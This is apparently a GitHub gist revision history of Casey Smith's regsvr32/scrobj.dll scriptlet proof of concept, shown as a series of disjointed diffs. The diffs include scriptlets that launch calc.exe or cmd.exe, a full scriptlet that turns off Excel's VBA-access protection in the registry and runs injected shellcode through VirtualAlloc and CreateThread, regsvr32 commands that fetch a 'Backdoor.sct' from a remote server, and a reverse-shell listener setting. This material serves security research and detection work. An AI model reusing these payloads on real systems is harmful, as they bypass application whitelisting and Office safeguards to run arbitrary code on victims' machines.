Revisions
-
enigma0x3 revised this gist
Oct 2, 2016 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -8,7 +8,7 @@ <script language="JScript"> <![CDATA[ ]]> </script> -
Oct 2, 2016 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -8,7 +8,7 @@ <script language="JScript"> <![CDATA[ var r = new ActiveXObject("VBScript.RegExp"); ]]> </script> -
Oct 2, 2016 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -8,7 +8,7 @@ <script language="JScript"> <![CDATA[ var r = new ActiveXObject("Scripting.FileSystemObject"); ]]> </script> -
Oct 2, 2016 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -8,7 +8,7 @@ <script language="JScript"> <![CDATA[ var r = new ActiveXObject("Scripting.Dictionary"); ]]> </script> -
secdev02 revised this gist
Apr 27, 2016 . No changes.There are no files selected for viewing
-
Apr 27, 2016 . 1 changed file with 2 additions and 1 deletion.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,9 +1,10 @@ <?XML version="1.0"?> <scriptlet> <registration progid="PoC" classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > <!-- Proof Of Concept - Casey Smith @subTee --> <!-- License: BSD3-Clause --> <script language="JScript"> <![CDATA[ -
Apr 27, 2016 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -7,7 +7,7 @@ <script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); ]]> </script> -
Apr 27, 2016 . No changes.There are no files selected for viewing
-
Apr 27, 2016 . No changes.There are no files selected for viewing
-
Apr 27, 2016 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -7,7 +7,7 @@ <script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script> -
Apr 22, 2016 . No changes.There are no files selected for viewing
-
Apr 21, 2016 . 1 changed file with 2 additions and 0 deletions.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -14,6 +14,8 @@ Listening Server IP Address For Python Version See https://github.com/Hood3dRob1n/JSRat-Py/blob/master/JSRat.py #> $Server = '127.0.0.1' #Listening IP. Change This. -
Apr 21, 2016 . 1 changed file with 61 additions and 0 deletions.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,61 @@ <?XML version="1.0"?> <scriptlet> <registration progid="CalcShellcode" classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > <!-- Proof Of Concept - Casey Smith @subTee --> <!-- Orginal Shellcode Example : https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/ --> <script language="JScript"> <![CDATA[ var objExcel = new ActiveXObject("Excel.Application"); objExcel.Visible = false; var WshShell = new ActiveXObject("WScript.Shell"); var Application_Version = objExcel.Version;//Auto-Detect Version var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); var objWorkbook = objExcel.Workbooks.Add(); var xlmodule = objWorkbook.VBProject.VBComponents.Add(1); strCode = '#If Vba7 Then\n' strCode += 'Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr\n' strCode += 'Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr\n' strCode += 'Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr\n' strCode += '#Else\n' strCode += 'Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long\n' strCode += 'Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long\n' strCode += 'Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long\n' strCode += '#EndIf\n' strCode += '\n' strCode += 'Sub ExecShell()\n' strCode += ' Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long\n' strCode += '#If Vba7 Then\n' strCode += ' Dim Xlbufvetp As LongPtr\n' strCode += '#Else\n' strCode += ' Dim Xlbufvetp As Long\n' strCode += '#EndIf\n' strCode += ' Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _\n' strCode += '139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _\n' strCode += '13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _\n' strCode += '116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _\n' strCode += '214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _\n' strCode += '36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _\n' strCode += '139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _\n' strCode += '235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _\n' strCode += '224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _\n' strCode += '187,71,19,114,111,106,0,83,255,213,99,97,108,99,0)\n' strCode += ' Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)\n' strCode += ' For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)\n' strCode += ' Wyzayxya = Hyeyhafxp(Zolde)\n' strCode += ' Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)\n' strCode += ' Next Zolde\n' strCode += ' Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)\n' strCode += 'End Sub\n' xlmodule.CodeModule.AddFromString(strCode); objExcel.Run("ExecShell"); objExcel.DisplayAlerts = false; objWorkbook.Close(false); ]]> </script> </registration> </scriptlet> -
Apr 21, 2016 . 1 changed file with 0 additions and 14 deletions.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -93,20 +93,6 @@ while ($true) { ]]> </script> </registration> </scriptlet> -
Apr 20, 2016 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -7,7 +7,7 @@ <script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); ]]> </script> -
Apr 20, 2016 . 1 changed file with 15 additions and 0 deletions.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,15 @@ <?XML version="1.0"?> <scriptlet> <registration progid="Empire" classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > <!-- Proof Of Concept - Casey Smith @subTee --> <script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script> </registration> </scriptlet> -
Apr 20, 2016 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -23,7 +23,7 @@ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script> </registration> <public> -
Apr 19, 2016 . 1 changed file with 2 additions and 6 deletions.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -7,12 +7,8 @@ version="1.00" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" > <!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll <!-- DFIR --> <!-- .sct files are downloaded and executed from a path like this --> <!-- Though, the name and extension are arbitary.. --> -
Apr 19, 2016 . 1 changed file with 0 additions and 0 deletions.There are no files selected for viewing
File renamed without changes. -
Apr 19, 2016 . 1 changed file with 0 additions and 2 deletions.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -25,8 +25,6 @@ <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script> -
Apr 19, 2016 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -25,7 +25,7 @@ <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); var wshShell = new ActiveXObject("WScript.Shell"); var btn = wshShell.Popup("Ask Yourself. Was That Wise?", 7, "Bandit:", 0x4 + 0x20); ]]> -
Apr 19, 2016 . 1 changed file with 2 additions and 0 deletions.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -25,6 +25,8 @@ <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); var wshShell = WScript.CreateObject("WScript.Shell"); var btn = wshShell.Popup("Ask Yourself. Was That Wise?", 7, "Bandit:", 0x4 + 0x20); ]]> </script> -
Apr 19, 2016 . 1 changed file with 0 additions and 2 deletions.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -25,8 +25,6 @@ <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script> -
Apr 19, 2016 . 1 changed file with 2 additions and 1 deletion.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -25,7 +25,8 @@ <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); var wshShell = WScript.CreateObject("WScript.Shell"); wshShell.Popup("Ask Yourself. Was That Wise?", 7, "Bandit:", 0x0); ]]> </script> -
Apr 19, 2016 . 1 changed file with 2 additions and 1 deletion.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -24,7 +24,8 @@ <script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); WScript.Echo("Thanks For Launching Bandit. I told You..."); ]]> </script> -
Apr 19, 2016 . No changes.There are no files selected for viewing
-
Apr 19, 2016 . 1 changed file with 0 additions and 0 deletions.There are no files selected for viewing
File renamed without changes. -
Apr 19, 2016 . 1 changed file with 2 additions and 0 deletions.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,5 +1,7 @@ <# Bandit Author: Casey Smith @subTee License: BSD3-Clause -
Apr 19, 2016 . 2 changed files with 4 additions and 4 deletions.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -2,8 +2,8 @@ <scriptlet> <registration description="Bandit" progid="Bandit" version="1.00" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" > This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -51,8 +51,8 @@ while ($true) { <scriptlet> <registration description="Bandit" progid="Bandit" version="1.00" classid="{90001111-0000-0000-0000-0000FEEDACDC}" > -
Apr 19, 2016 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -5,7 +5,7 @@ description="Empire" progid="Empire" version="1.00" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" > <!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll --> <!-- regsvr32 /s /i:http://server/Backdoor.sct scrobj.dll -->
NewerOlder